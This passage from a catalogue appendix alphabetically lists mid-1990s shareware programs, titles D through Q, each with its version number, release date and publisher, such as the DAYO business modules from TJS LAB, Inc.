(05-31-95) EmmaSoft Software Company, + Inc. + DATA PROTECTOR 2.02 (11-01-95) PIGAS INC. + Data Wire Four 1.4.1 (07-20-95) C & R Business Systems Ltd. + DATABASE BROWSER 1.21 (04-15-95) Redei Enterprises + DataBrowser 1.0 (10-03-95) Software Avenue, Inc. + Dave Dude 2.1 (05-14-95) APG Entertainment + Dave Dude for Win95 2.5 (02-14-96) APG Entertainment + A Day at the Races 1.3 (11-16-95) LatticeWork Software + A Day at the Races 1.3 (11-15-95) LatticeWork Software + Day By Day 1.3 (05-05-95) Q&D Software Development + DayLog 3.0 (05-30-96) C & E Associates + DayMaster 4.10 (09-01-94) Unicorn Software Limited + DayMaster For Windows 2.10 (12-19-95) Unicorn Software Limited + DAYO ACCOUNTS PAYABLE (AP) 4.61+ (03-01-94) TJS LAB, Inc. + DAYO ACCOUNTS RECEIVABLE (AR) 4.61+ (03-01-94) TJS LAB, Inc. + DAYO BACK ORDERS (BO) 4.50+ (02-01-94) TJS LAB, Inc. + DAYO BAR CODE 3 OF 9 4.55+ (03-01-94) TJS LAB, Inc. + DAYO BILLING & INVOICING 4.61+ (03-01-94) TJS LAB, Inc. + DAYO END OF PERIOD 4.50+ (02-01-94) TJS LAB, Inc. + DAYO GENERAL LEDGER (GL) 4.60+ (03-01-94) TJS LAB, Inc. + DAYO INDEX 4.50+ (02-01-94) TJS LAB, Inc. + DAYO INVENTORY 4.56+ (03-01-94) TJS LAB, Inc. + DAYO LITTLE POS 4.62+ (03-15-94) TJS LAB, Inc. + DAYO MEMBERSHIP 4.40+ (01-01-94) TJS LAB, Inc. + DAYO MENU 4.14+ (12-01-93) TJS LAB, Inc. + DAYO MRP 4.61+ (03-15-94) TJS LAB, Inc. + DAYO ORDER ENTRY 4.60+ (03-01-94) TJS LAB, Inc. + DAYO PASSWORDS 4.50+ (01-01-94) TJS LAB, Inc. + DAYO PAYROLL 4.61+ (03-01-94) TJS LAB, Inc. + DAYO POS (POINT OF SALE) 4.61+ (03-01-94) TJS LAB, Inc. + DAYO PRICE BOOK 4.50+ (12-01-93) TJS LAB, Inc. + DAYO QUOTES 4.61+ (02-01-94) TJS LAB, Inc. + DAYO RENTAL POS 4.61+ (02-01-94) TJS LAB, Inc. + DAYO RETURN MANAGEMENT SYSTEM 4.00+ (12-01-94) TJS LAB, Inc. + DAYO SALES MANAGEMENT SYSTEM 4.42+ (02-01-94) TJS LAB, Inc. + + Appendix E, "Sorted list of all programs" 741 + + + + DAYO SERVICE DISPATCH 3.20+ (03-01-94) TJS LAB, Inc. + DAYO SIMPLE POS 4.61+ (01-01-94) TJS LAB, Inc. + DAYO SMART REPORTS 4.51+ (12-01-93) TJS LAB, Inc. + DAYO TIME & BILLING 4.50+ (12-01-93) TJS LAB, Inc. + DAZZLE 5.1b (03-19-95) Worldwide MicroTronics, Inc. + DBKIT 2.5 (03-01-94) P. C. Softsmith + DDE Requester for Win3.x & NT 1.01.00 (03-31-94) Westerdale AG + Dear Diary 3.0 (06-22-95) Q&D Software Development + Debt Analyzer for Windows 2.0 (12-20-95) Insight Software + Solutions, Inc. + Declaration of War 1.1 (08-15-94) Burnham Park Software, Inc. + The Deer Expert 4.2 (05-01-94) Strat-Tech, Inc. + DELEGATOR for Windows 1.0 (10-25-95) Madrigal Soft Tools Inc. + DeltaCad 1.1 (12-12-95) Midnight Software, Inc. + The DemoMaker 1.55 (04-02-94) Ron Janorkar + Depleter 2.2 (07-29-95) Cordes Development + DeskTop Advisor(R) 2.0 (12-04-93) Ivden Technologies, Inc. + DEXTER Text Editor 2.00 (01-16-95) FAGERLUND CONSULTING + DFInfo VBX 2.1 (08-14-94) Mabry Software + Diamond Data 4.6 (07-30-94) The Software Construction Co. + Dino Cards 1.0 (01-09-96) DynoTech Software + Dino Match 4.0 (01-09-96) DynoTech Software + Dino Numbers 4.0 (01-01-96) DynoTech Software + Dino Spell 4.0 (01-09-96) DynoTech Software + Dino Trilogy 4.0 (01-09-96) DynoTech Software + Discover Juggling 1 - Balls 0.97 (05-17-96) Midi Age + Productions + Discover Karate 1 - White Belt 0.97 (05-17-96) Midi Age + Productions + Disk Drive Cleaner 1.0 (10-24-93) Rosenthal Engineering + Disk Piecharter 1.1 (03-08-95) Zorn Software + Disk Piecharter 2.0 (02-24-96) Zorn Software + DISKLIST 3.06 (01-25-94) Gulf Sierra + DizView 2.0 (06-09-95) Lincoln Beach Software + dMAIL4 4.0.1 (07-20-95) C & R Business Systems Ltd. + DMPLAS (Dot Matrix to LaserJet) 1.1 (11-15-91) Software Co-op + DOC DEFIANT 1.0 (02-01-94) Just For Me Software, Inc. + Docudex Document Imaging 1.50 (12-10-95) Informatik Inc. + Docuthek Document Imaging 1.50 (12-10-95) Informatik Inc. + Doomsday Screen Saver 1.10 (11-11-95) Tay-Jee Software + Corporation + DOS Menu 2.21 (01-01-96) MicroFox Company + DOS Summary 1.01 (02-23-91) Computer Knowledge + DOS Summary (Hypertext) 2.0 (02-15-92) Computer Knowledge + Double Directory 1.40 (06-01-93) 100% Cotton Software + dPerfect Merge 2.0 (05-16-95) Newdorf Research + DR. FORM 3.1 (03-01-94) IrwinWare + DRAFT CHOICE 2.00e (01-06-94) TRIUS, Inc. + Drag and Drop Printing v2.0 (02-01-94) FLFSoft Inc. + Drag And View 2.0 (07-12-93) Canyon Software + Drag And Zip 2.41 (06-22-93) Canyon Software + Dragons Bane: Mah Jongg II 1.2 (03-27-96) Arcanum Computing + DRIV_MAN 1.30 (10-31-94) MicroMetric + dVERSION 2.0 (09-05-93) C & R Business Systems Ltd. + + Appendix E, "Sorted list of all programs" 742 + + + + DXF Bill of Materials Generator DOS1.00 (03-01-95) Annabec + Business Services + E-report 2.0 (06-15-95) Informatik Inc. + Early Bird 1.0f (03-01-95) Burnham Park Software, Inc. + Easy Backup 6.1 (12-06-95) Easy Software + Easy Base 10.3 (12-14-95) Easy Software + Easy Install 6.0 (08-17-95) Easy Software + Easy Menu 6.5 (08-30-95) Easy Software + Easy SFX 1.0 (08-17-95) Easy Software + Easy Word 10 (10-01-95) Easy Software + Easydial 4.5 (01-22-93) Patri-Soft + Ecomaster 1.01 (09-01-95) Cascoly Software + Econ's Arena 1.04 (05-18-95) Glen DeBiasa + EDDY (EDit DirectorY) 8c (05-12-96) John Scofield + EDGEFLOW 5.0 (02-24-93) Pacestar Software + EDITEUR V2.3.1 (02-01-96) Jean-Pierre Menicucci + EGATrek 3.1 (09-01-94) Arcanum Computing + Elbow Grease for Windows 2.0 (06-01-96) AMF + Electronic Postal Window(tm) 1.6 (07-09-95) EmmaSoft Software + Company, Inc. + The Electronic Square 1.03 (06-19-95) Electronic Creativity + Products + EMERI 1.3 (05-01-93) Rhode Island Soft Systems, Inc. + EMS4C Library 1.0 (10-18-93) MarshallSoft Computing, Inc. + Enigmacross for Windows 2.0 (11-23-95) Crossdown + ENTER-EASE 1.1 (09-29-94) KAYL SOFTWARE + EnVision Publisher 1.0 (09-01-92) Software Vision Corporation + ENVI_MAN 1.10 (01-01-94) MicroMetric + Equatron 2.10 (07-08-95) Glen DeBiasa + ES-NEWS 2.29 (05-01-95) Extensions Software Corporation + ES-NMB 1.25 (05-01-95) Extensions Software Corporation + Examine 1.12 (08-08-94) Aquila Software + ExamineZip 1.01 (08-08-94) Aquila Software + Exile: Escape From the Pit 1.0.3 (09-08-95) Spiderweb Software + Exile: Escape From the Pit 1.2 (09-08-95) Spiderweb Software + EXPRESSCALC 4.10 (05-02-92) Expressware Corporation + EXPRESSCHECK 4.04 (11-18-93) Expressware Corporation + EXPRESSGRAPH 1.05 (05-01-92) Expressware Corporation + Extract It 1.00 (07-14-95) TeraByte Unlimited + EZ-Index - Popular Photography 1.90 (10-10-95) E-Z Access + Software Ltd. + EZ-Index - Canadian Geographic 1.90 (10-10-95) E-Z Access + Software Ltd. + EZ-Index - National Geographic 1.90 (10-10-95) E-Z Access + Software Ltd. + EZ-Index for Traveler 1.90 (10-10-95) E-Z Access Software Ltd. + EZ-Tree 2.31 (01-01-96) MicroFox Company + EZinst 1.2 (07-28-94) Burnham Park Software, Inc. + EZSET 2.1 (12-05-93) McAdams Associates + Family Calendar for Windows 1.30 (04-18-95) Command Line + Software + Family Scheduler 1.1 (09-24-95) Madrigal Soft Tools Inc. + FastBreak Fantasy Basketball 3.08 (02-18-94) McS Custom + Software + + Appendix E, "Sorted list of all programs" 743 + + + + FasType for MS-DOS 1.2 (12-31-94) Trendtech Corporation + FasType for Windows 5.0 (01-01-96) Trendtech Corporation + FAXHAVEN 1.0 (10-01-94) HTF Consulting + FaxMail for Windows v5.02 (12-31-95) ElectraSoft + FBScheduler 1.00 (10-20-95) Forrest D. Bruner + FCV 1.1 (01-31-96) Nounfield Ltd. + FDplot 1.3 (07-12-92) Abri Technologies, Inc. + THE FEELING'S MUTUAL-DOS 3.1.93 (04-01-94) Interpretive + Software Inc. + THE FEELING'S MUTUAL-Macintosh 3.1.93 (04-15-94) Interpretive + Software Inc. + THE FEELING'S MUTUAL-WINDOWS 3.1.93 (04-01-94) Interpretive + Software Inc. + FeeRate for Windows 1.2 (10-19-95) Tesserax Information + Systems + FeeRate for Windows 95 / NT 2.0 (03-24-96) Tesserax + Information Systems + FF Business Cards 1.0 (12-08-94) M & R Technologies, Inc. + FF Designer Envelopes 1.2 (12-01-94) M & R Technologies, Inc. + FF Graphics Conversion Utility 1.1 (12-20-94) M & R + Technologies, Inc. + Fictionary 1.32 (04-30-90) Cascoly Software + FILE EXPRESS 5.1 (12-10-93) Expressware Corporation + File Finder/Grouper 2.02 (04-16-95) EnGamma + File Manager Jr. 1.2 (12-07-94) Charles R. Maher + File Maven 3.0 (03-14-95) Kent Briggs + File-Ex 1.04 (04-25-96) Cottonwood Software + FileMod 1.2 (06-17-95) Lincoln Beach Software + FileSafe 1.02 (05-15-94) JAYAR Systems + File_Handle Filer/Finder/Shell 2.10 (02-05-96) Hasoft + FILE_MAN 4.30 (01-01-94) MicroMetric + Financial Analysis For Windows 4.30 (03-26-96) Gjetaas, Inc. + Financial Freedom 2.0 (02-01-94) M & R Technologies, Inc. + Financial Freedom Billing Mgr. 2.3 (12-15-94) M & R + Technologies, Inc. + Financial Freedom GOLD 1.0 (03-30-94) M & R Technologies, Inc. + Finders Keepers 1.01 (04-08-95) Glen DeBiasa + First Impression 3.1 (06-09-95) Lincoln Beach Software + The Fish Expert 3.2 (05-01-94) Strat-Tech, Inc. + Fishtime 3.5 (09-12-95) C & E Associates + Fixed Asset Pro 2.1 (07-15-95) HammerSoft, Inc. + Flexitime/Time Logging 5.32 (06-01-95) HJS Systems + Flu_Shot+ 1.83 (07-11-93) Software Concepts Design + FMDrop VBX 1.1 (08-14-94) Mabry Software + Folders 2.0 (03-22-95) Target Software + FontBook Professional 2.7 (06-13-94) The C Group, Inc. + Fonter 6.2 (04-15-94) OsoSoft + Fonts Ink Fonts 1 (01-04-93) Software Co-op + Form Editor (FED) 1.15 (01-01-96) MicroFox Company + Fortune Teller 4.4a (09-30-95) R.K. West Consulting + FPLAN-KWIK Financial&Retire Pln 1.0 (06-14-94) First Financial + Software + FreeForm 2.3 (11-01-94) Herne Data Systems Ltd + Frenetic Screensaver 3.3 (06-01-95) Seraline Pty Ltd + + Appendix E, "Sorted list of all programs" 744 + + + + From Diapers To Diplomas 2.2 (12-22-95) BlueCollar Software + From Scratch recipe processor 3.04 (11-01-94) Desktop + Solutions + FSave 1.1 (03-15-95) KMR Consulting + FSLOGIN 2.22 (07-22-96) Confirm + FundRaiser Basic 1.32 (03-08-95) Professional Support Software + GAKUSEI 1.1.3 (06-12-94) Barham Software + GammaCAD PRO 2.02 (03-06-96) Gamma Software + GARDENING BUSINESS 1.1 (03-25-95) Redei Enterprises + GasWat (Gas-Water Interactions) 4.0 (06-01-96) NorDecor + GEMCAP 4.02 (03-07-93) Natural Software + Geomancy 4.7 (05-19-95) R.K. West Consulting + GetBack 2.4 (12-24-92) MicroTools Inc + Gif+Web Transparent GIF Editor 1.10 (12-28-95) Informatik Inc. + Golf Tournament Scorekeeper 1.2 (07-04-94) Home Alone Software + Golfhcap 5.5 (09-12-95) C & E Associates + Good Credit 1.2 (08-18-85) Cordes Development + GOW (Gas-Oil-Water properties) 4.0 (01-06-96) NorDecor + GradeBook for Windows 3.07 (04-07-95) R&R EdWare + Graphcat/DOS Clip Art Cataloger 3.2 (11-01-95) Science + Translations Software Services + Graphcat/Win Clip Art Cataloger 4.0 (06-15-96) Science + Translations Software Services + GREEN 1.11 (05-10-93) Cascoly Software + GridForm 1.0 (12-15-91) Software Co-op + Grow'Em 3.0 (03-01-95) Paul Postuma + GTI Desktop+ 1.2 (10-11-95) GTI Ltd + GTI WordGrid 2.1 (10-05-96) GTI Ltd + Hands On Remote Control/Access 5.5 (08-29-95) P. C. Softsmith + HandyDOS 1.6 (10-22-92) Abri Technologies, Inc. + Hang Man 1.1 (08-16-94) Burnham Park Software, Inc. + HangWin 2.04 (07-15-95) Temprano Software + Hard Disk Director 5.2 (03-15-92) Canyon Software + Hard Wire Four 2.8.1 (07-20-95) C & R Business Systems Ltd. + Have You Read That Movie? 1.0 (04-01-91) 100% Cotton Software + HDM - Hard Disk Menu 5.04 (01-01-96) MicroFox Company + Heart Smart 4.01 (04-26-96) Henning Associates + Hebrew Edit 1.2b (02-14-94) Right to Left Software + Helpgen 1.20 (09-06-94) Rimrock Software + HiMOVE 2.20 (05-12-93) C.Sitte Softwaretechnik + HiVIDEO 2.03 (05-08-93) C.Sitte Softwaretechnik + HOLD-ANYTHING! 1.1 (02-21-93) Elk Creek Software + Home Plan 2.7 (11-01-94) Home Plan + Home Refinancing 1.2 (03-21-94) ProDomus, Inc. + HOME/OFFICE INVENTORY 1.0 (03-28-94) ProDomus, Inc. + Household Register 3.12 (12-27-93) TurboSystemsCo + How to join as a "beta" author n/a (11-27-89) Association of + Shareware Professionals + HQ-FAX (1-Step High Quality FAX 2.0 (09-30-94) HTF Consulting + Hubble 2.21 (06-15-95) Hubble Software Company + I Ching Empower Tool 1.5 (11-28-95) Roger Norton Consulting + I&M USA 1.05 (05-05-94) C T Johnson, Inc + IBM PC Author Application n/a (11-14-92) Association of + Shareware Professionals + + Appendix E, "Sorted list of all programs" 745 + + + + ICP 11 (02-01-94) Spirit7 Software, Ltd. + Image'n'Bits 1.0 (11-24-93) Bananas Software Inc + Information about copyrights n/a (04-29-90) Association of + Shareware Professionals + Infothek Information Manager 1.50 (12-15-95) Informatik Inc. + IniCon VBX 3.1 (08-14-94) Mabry Software + IniCtrls 1.15 (12-16-95) Prodigy Computing + INSTINDX 1.0 (09-01-94) C T Johnson, Inc + INSTSPEC 1.0 (05-05-93) C T Johnson, Inc + Intelliship 6.5 (05-01-96) Intelliware + INVENTORY & COST CONTROL 4.2 (01-15-94) First Step Software + Inventory Interface 7.25 (04-01-95) Data Interface + IPIN PhotoCalendar 1.5 (12-01-95) Telnet Computer Consultant + ISO (Orifice meters) 4.0 (06-01-96) NorDecor + J-Works 2.2 (03-01-95) MicroWorks Inc. + JailBird 2.50 (03-25-95) RMH Computer Services + Jasc Media Center 2.02 (07-13-95) JASC, Inc. + Jason's File Finder 2.0d (09-03-93) RMH Computer Services + JETCOL 9.5 (12-21-95) ARCaine Technology + JetLauncher 1.1 (04-23-96) Saturday*s Child + Jokes & Quotes 1.4 (02-12-94) Michael L. Wester + JoyStk VBX 1.2 (08-14-94) Mabry Software + JRchive 1.02 (11-01-93) JAYAR Systems + JRE Home Inventory 6.3 (09-30-94) JRE Enterprises + Judy's TenKey 3.0 (10-20-94) Judy's Applications + Katelin Comment Manager 1.20 (09-26-94) Katelin, Inc. + KBBLH120.ZIP 1.20 (01-15-96) Joseph G. Savino + Keyboard Coach Fantasy Football 1.03 (01-08-94) McS Custom + Software + Keyboard Express 1.1 (02-10-96) Insight Software Solutions, + Inc. + Keyed File System (DOS) 2.12 (05-16-94) APT Computer + Solutions, Inc. + Keyed File System (OS/2) 2.12 (04-11-94) APT Computer + Solutions, Inc. + Kid's Art 1.1 (09-20-94) R.K. West Consulting + Kidproof for Windows 1.0 (08-16-95) Applied Softworks Inc. + Kith and Kin 3.03 (02-20-96) SpanSoft + Know It All 1.0 (11-11-95) Software Avenue, Inc. + LAN Menu 2.06 (01-01-96) MicroFox Company + Landscape Explorer 3.01 (01-01-95) WoolleySoft + LAPC - Loan Advisor for the PC 2.3 (04-01-94) J.D. Consulting + Associates + LASR_MAN 6.05 (10-31-94) MicroMetric + The Lawyer's DeskTop 2.1 (07-25-94) DataPro Enterprises, Inc. + Layout 3.1 (03-25-92) Software Co-op + LEADING AND MANAGING OTHERS 1.0 (09-19-94) Chatfield Software, + Inc. + League Manager 1.90 (04-16-94) Al Dodd Software Co. + Lecture 1.02 (12-14-92) Barn Owl Software + LegRoom 3.0 (02-06-95) Ivden Technologies, Inc. + LessonPlanZ 2.60 (09-01-94) Unicorn Software Limited + LessonPlanZ For Windows 2.00 (01-09-96) Unicorn Software + Limited + + Appendix E, "Sorted list of all programs" 746 + + + + The Letterhead Kit-32/Win 7.0 (06-15-96) Science Translations + Software Services + The Letterhead Kit/DOS 3.1 (05-01-96) Science Translations + Software Services + The Letterhead Kit/Win 3.1 (07-15-96) Science Translations + Software Services + The Lights Go Down 2.20 (07-07-95) Thomas Hoevel Software- + Development + LineDrive Fantasy Baseball 6.13 (02-18-94) McS Custom Software + LinguaPro/SPANISH 2.50 (09-06-94) Schulenberg and Associates, + Inc. + Link 2.1 (05-01-95) Target Software + ListBuilder 1.1 (06-27-95) Younkin Enterprises + Little Black Book 3.0 (10-25-94) Q&D Software Development + Little Lists 3.2 (07-28-95) R.K. West Consulting + LOAN CHIEF 1.12 (12-20-95) Insight Software Solutions, Inc. + Loan Master 1.52.14 (10-01-94) Bottom Line Software, Inc. + Lotto Prophet 5.0 (01-05-95) DataMicro, Inc. + Lotto Thunder (PICK-6 Version) 1.4 (05-01-95) Charles P.Staats + LQ 2.35 (10-01-90) Granny's Old-Fashioned Software + Lunar Taskbar Almanack 1.20 (11-30-95) clySmic Software + MacIntosh Author Application n/a (09-03-92) Association of + Shareware Professionals + Mah Jongg-Solitaire 4.2 (09-01-94) Arcanum Computing + Managing Your Food 4.51 (01-01-94) MYF Software + MapDraw 2.1 (12-15-95) Informatik Inc. + MAPIT 1.4 (04-15-94) Allison Software + MARGARINE 3.21 (03-22-95) Tay-Jee Software Corporation + Marnav 4.5 (09-12-95) C & E Associates + Master Disk 2.0 (10-24-93) Rosenthal Engineering + MATH CHALLENGE 2.0 (03-01-94) Just For Me Software, Inc. + MathCounts 1+2 1.2 (01-07-94) Able Art Software + MathCounts 3+4 1.2 (01-07-94) Able Art Software + MathWiz 2.0 (06-15-95) Informatik Inc. + MAXI Form 1.8 (12-01-93) Herne Data Systems Ltd + Mayan Calendar 3.8a (12-27-94) R.K. West Consulting + MCBase 2.3b (04-05-96) Harry Doldersum + Medieval War 1.5 (02-16-95) Burnham Park Software, Inc. + Medieval War Door 1.0 (02-21-95) Burnham Park Software, Inc. + MEG SYSTEM INFO GRAPHS PIE 3-D 3.5 (07-30-94) Jim Tolliver + MEGA EDIT Editor for Windows 2.11 (03-24-94) COMPUTER + WITCHCRAFT, INC. + MegaBack Hard Disk Backup 2.3 (04-27-93) Patri-Soft + MegaWord 6.01 (04-26-94) Merlot International + MenuEv VBX 3.1 (08-14-94) Mabry Software + MENU_MAN 2.00 (01-01-94) MicroMetric + MERIT BADGE TRACKER 4.0 (06-02-95) Robert Barrentine + Consulting + MERLIN'S MATH 1.03 (05-04-94) Awareness Productions + The MetaKit Library 1.2 (05-28-96) Meta Four Software + MicroCook 1.96 (02-01-96) NORSKi Software + MicroFox Baseball Statistics 1.02 (01-01-96) MicroFox Company + MicroFox DOS Utilities 1.15 (01-01-96) MicroFox Company + MicroPlayerCD(tm) 1.03 (02-26-94) Daniel Thomas + + Appendix E, "Sorted list of all programs" 747 + + + + Minefield For Everybody 1.1 (06-01-94) Judah Warshaw + ModemSta 1.9 (04-21-96) TeddyWare + Money Math for Windows 2.1 (07-01-96) Lovell's + Money Organizer 2.0 (04-11-95) Redei Enterprises + THE MORTGAGE ANALYZER 2.04 (12-20-95) Insight Software + Solutions, Inc. + MotelMAX 2.10 (05-01-94) MKM Software + Mouse Clock (tm) for Windows 2.0 (06-01-96) AMF + Mouse Math 1.0 (08-15-95) Hufnagel Software + MouseTools 1.0 (09-13-89) Arcanum Computing + MOZART (Virtuoso Edition) 1.3 (01-03-95) David Webber + MS Mega Pack (VBXes) 1.0 (08-14-94) Mabry Software + MSlot VBX 1.0 (08-14-94) Mabry Software + MultiLabel 3.5 (04-01-94) OsoSoft + MultiVu 2.0 (11-20-95) Ivden Technologies, Inc. + Music Sculptor for Windows 1.4 (03-07-94) Aleph Omega Software + Musical Instrument Tuner 1.01 (02-23-94) SoundByte Software + A MUSICAL TUTORIAL 1.1 (06-01-95) R. Swerdfeger + A MUSICAL TUTORIAL for Windows 1.2 (06-01-95) R. Swerdfeger + MusicEase 4.2 (09-10-85) RMH Computer Services + My Life 2.2 (09-30-94) JRE Enterprises + Mystic Pixels 1.1 (06-06-94) Tesuji Technology + NAMEBASE 3.2 (02-26-93) Elk Creek Software + NeMenu 1.01 (12-01-93) Just-In-Time Computing Services + Neural Network VBX 1.1 (10-25-95) ENSOFT + New Menus for Windows 1.41 (11-29-94) Dipl.Ing. Roger Rene + Kommer + New Testament for Windows 1.61 (04-04-94) Rocky Mountain + Laboratories + NFL Forecaster for DOS 4.1d (05-15-96) 100% Cotton Software + NFL Forecaster for Windows 4.1w (05-15-96) 100% Cotton + Software + No*STOP SUPRDUPE 3.1 (06-16-95) NONSTOP NETWORKS LIMITED + NoiseKiller V1.2 (02-01-96) Jean-Pierre Menicucci + Nominal Pipe Size for Windows 2.1 (03-28-94) Herne Data + Systems Ltd + NoteWorthy 1.87 (12-29-94) Braeburn Software + Notice Board 2.2 (03-07-94) Cornerstone Software Limited + NPS - Nominal Pipe Size 2.1 (10-01-92) Herne Data Systems Ltd + NUMERO UNO 1.05 (11-19-94) Christopher J. Noyes Software + NuMorse Morse Code trainer 1.30e (07-27-95) A. Lacy + O.R.B.Y. 1.0 (12-21-93) Able Art Software + Office Supplies Tracker 1.42 (03-18-94) RMH Computer Services + Official ASP Catalogs n/a (01-01-80) Association of Shareware + Professionals + OLYMPIAD 1.6 (12-15-95) Nine-Patch Software + OMNIDay 4.30 (10-01-94) Unicorn Software Limited + OMNIDay For Windows 3.00 (03-29-95) Unicorn Software Limited + On This Day 2.0 (07-30-94) The Software Construction Co. + On This Day for Windows 2.0 (07-30-94) The Software + Construction Co. + ON-SIDE 2.0 (10-20-93) Expressware Corporation + Open Menu 2.5 (03-18-94) P. C. Softsmith + OpenHome 3.10 (07-16-95) Temprano Software + + Appendix E, "Sorted list of all programs" 748 + + + + Over_LAZ HP 4 (01-01-94) Herne Data Systems Ltd + Over_LAZ PS 3 (01-15-93) Herne Data Systems Ltd + OWShare - Delphi 1.0 (08-06-95) Open Windows + OWShare - VB 1.0 (09-09-95) Open Windows + P.I.M. for Word for Windows 95 (06-01-96) AMF + PACK TRACKER 4.0 (10-01-94) Robert Barrentine Consulting + PageFocus 3.1 (01-13-96) Creative Stars, Inc. + Paint Shop 3.0 (08-14-93) JASC, Inc. + Paint Shop Pro 3.11 (08-14-95) JASC, Inc. + PALERT 2.4 (10-22-91) Patri-Soft + Palette Adjuster 1.8 (06-17-95) Lincoln Beach Software + Palette Pleezer 1.25 (04-10-93) Cascoly Software + Paper Route Ledger 1.47 (01-03-95) RMH Computer Services + Papers 1.00 (12-01-93) clySmic Software + PATH_MAN 1.15 (01-01-94) MicroMetric + PATIENCE 10 4.01 (05-21-94) CoCoWare - Cowles Company Software + Patience Abroad 1.01 (05-21-94) CoCoWare - Cowles Company + Software + PATTR 1.5 (11-05-90) Patri-Soft + PC Chart V1.5 (07-15-93) Guru Systems Ltd. + PC-AP 1.8 (01-01-94) Medlin Accounting Shareware + PC-AR 4.3 (01-01-94) Medlin Accounting Shareware + PC-Draft II 3.26 (01-01-93) Natural Software + PC-Draft-CAD 3.06g (12-20-93) Natural Software + PC-ECAP 3.01 (01-24-94) Circuit Systems + PC-FOOD II FOOD COSTING 7.02 (06-03-95) SCHRECK SOFTWARE + PC-Fortune 2.20 (09-30-92) JAYAR Systems + PC-GL 3.8 (01-01-94) Medlin Accounting Shareware + PC-PR 2.4 (02-01-94) Medlin Accounting Shareware + PC-Proof 2.0A (10-18-93) Intellect Systems + PC-TimeClock 1.1 (11-01-94) KMR Consulting + PCDESK 5.6 (01-17-96) Robert Lindsay Wells + PCFDial 1.05 (05-26-92) Barn Owl Software + PCINV 1.3 (01-01-94) Medlin Accounting Shareware + PCLoan5 5.09 (09-01-94) Bottom Line Software, Inc. + PCOPY 9.3 (09-01-93) Patri-Soft + PDAILY 1.0 (10-10-86) Patri-Soft + PDEL 4.4 (05-01-92) Patri-Soft + PEG 2.06 (09-13-93) Cascoly Software + Penny Penguin's Math Bingo 2.3 (11-15-95) LatticeWork Software + Penny Penguin's Math Bingo <95> 2.3 (11-18-95) LatticeWork + Software + PentaBlox 1.01 (08-08-94) Aquila Software + PerCnt VBX 2.5 (08-14-94) Mabry Software + Periodic Table 3.0b (08-22-95) SMI Corporation + Personal Calendar (PC) 14.95 (01-21-96) FunStuff Software + Personal Challenge 1.1 (10-04-94) R.K. West Consulting + Personal Com Lib for PowerBASIC 4.3 (04-25-95) MarshallSoft + Computing, Inc. + Personal Comm Lib for Pascal 4.3 (04-25-95) MarshallSoft + Computing, Inc. + Personal Comm Lib for Windows 1.2 (11-20-95) MarshallSoft + Computing, Inc. + + Appendix E, "Sorted list of all programs" 749 + + + + Personal Comm Lib Visual BASIC 4.3 (04-25-95) MarshallSoft + Computing, Inc. + Personal Comm Library for C/C++ 5.0 (11-20-95) MarshallSoft + Computing, Inc. + Personal Comm Library VB / Win 1.0 (02-11-96) MarshallSoft + Computing, Inc. + Personal Finances 2 4.02h (01-12-94) Spitfire Software + Personal Protocol Lib 4 Pascal 1.0 (02-12-95) MarshallSoft + Computing, Inc. + Personal Protocol Lib for C/C++ 1.0 (02-12-95) MarshallSoft + Computing, Inc. + Personal Schedule 1.02 (04-20-95) Will Baldwin + Personal Tarot 3.1 (10-04-94) R.K. West Consulting + Phone Book Maker 1.7 (06-15-96) Ronnie Tsedek + Photo Show 3D 2.01 (09-07-95) Progressive Logic + PictureClock 1.00 (10-01-95) Tay-Jee Software Corporation + Playground 1.0a (01-04-95) Object International, Inc. + PLOTTER 7.7 (01-17-96) Robert Lindsay Wells + PMFLCOMP 1.61 (05-30-95) American Coders, LTD. + PocketD Plus 4.2 (11-05-94) PocketWare + PoeTrio 1.0 (04-07-91) Chatfield Software, Inc. + Poetry Generator 2.5 (01-01-96) R.K. West Consulting + POETRY STAR 1.1 (03-15-92) Chatfield Software, Inc. + PopDBF 4.05 (07-29-92) Lighthouse Software, Inc. + Portfolio Manager 5.3 (07-15-95) Shane Software International + POST TRACKER 1.0 (01-27-94) Robert Barrentine Consulting + PostCardMaster 4.20 (09-01-94) Unicorn Software Limited + Poster 2.3 (01-09-96) PosterSW + Postit for Windows 3.04 (04-30-96) Henning Associates + Power C Shell 2.5 (01-09-95) Tay-Jee Software Corporation + Power Edit 2.02 (06-15-95) Target Software + Power Planner 1.24 (02-16-96) Sphygmic Software Limited + PowerBatch 2.2 (05-15-94) CSD, Inc. + PPRINT 5.5 (11-22-91) Patri-Soft + Practical Joke Collection 2.0 (05-13-95) R.K. West Consulting + PrintEnvelope 3.01 (05-15-95) Maurer Associates + PrintGF 1.26 (09-17-95) Ravitz Software Inc. + PrintGL 1.58 (09-17-95) Ravitz Software Inc. + ProAct Contact Management 2.6 (01-01-94) ProDomus, Inc. + Probe VBX 1.0 (08-14-94) Mabry Software + ProDev*EPRICE 6.0 (12-06-94) Pro Dev Software + ProDev*MEMBER Church System 3.0g (01-16-95) Pro Dev Software + ProDev*QUOTE Quote/Bid System 6.0c (05-24-95) Pro Dev Software + Professional Capture Systems 2.0 (01-26-95) JASC, Inc. + Program for a Small Planet 6.0 (10-26-93) Strat-Tech, Inc. + Program Group Specialist 1.0 (05-23-95) MIS Resources + International + A Project/Event Planner 3.4 (12-12-94) Sapphire Software Inc. + Prompter - Speaker's Utility 1.2 (06-11-93) OsoSoft + Property Master 4.01 (05-20-94) MSdataBase Solutions + ProtoCAD 3D 2.00 (04-23-94) TRIUS, Inc. + PSA Cards for Windows 3.1 2.7 (04-01-96) PSA Software + PSA Cards for Windows 95/NT 2.7 (04-01-96) PSA Software + PSEARCH 5.2B (07-01-92) Patri-Soft + + Appendix E, "Sorted list of all programs" 750 + + + + PTOUCH 2.0 (02-03-93) Patri-Soft + PUBLIC ACCESS(tm) 2.5 (09-05-94) IN/QUEST, LLC + Public Address 3.1 (10-05-94) Paradise Programming + Puffer 1.0 (05-25-95) Kent Briggs + Puffwort's Evil Scheme 1.1 (10-01-95) Impact D. Publishing + Pulsar for Windows 3.1b (03-16-95) Tesserax Information + Systems + PUT, GET, Install Utilities 3.45 (01-01-96) MicroFox Company + q&dBase for Windows 2.0a (10-23-94) Q&D Software Development + QA Study Aid 5.3 (10-14-95) Quid Pro Quo Software + Qanalyst 2.05 (09-19-90) Barn Owl Software + QBALL 2.40 (06-01-94) Benjamin W. Hartley + Qbrws 2.12 (01-01-96) Ariadne-Beratung + QENV 2.5 (08-07-94) Annette Cuomo + QFiler 3.2 (07-15-91) Jamestown Software + QFont 1.5 (10-20-90) Jamestown Software + QIC-BAT for CMS 1.2 (11-08-93) Command Line Software + QRead 2.0 (03-23-95) DS Products + QRead for Windows 95 2.1 (05-25-96) DS Products + 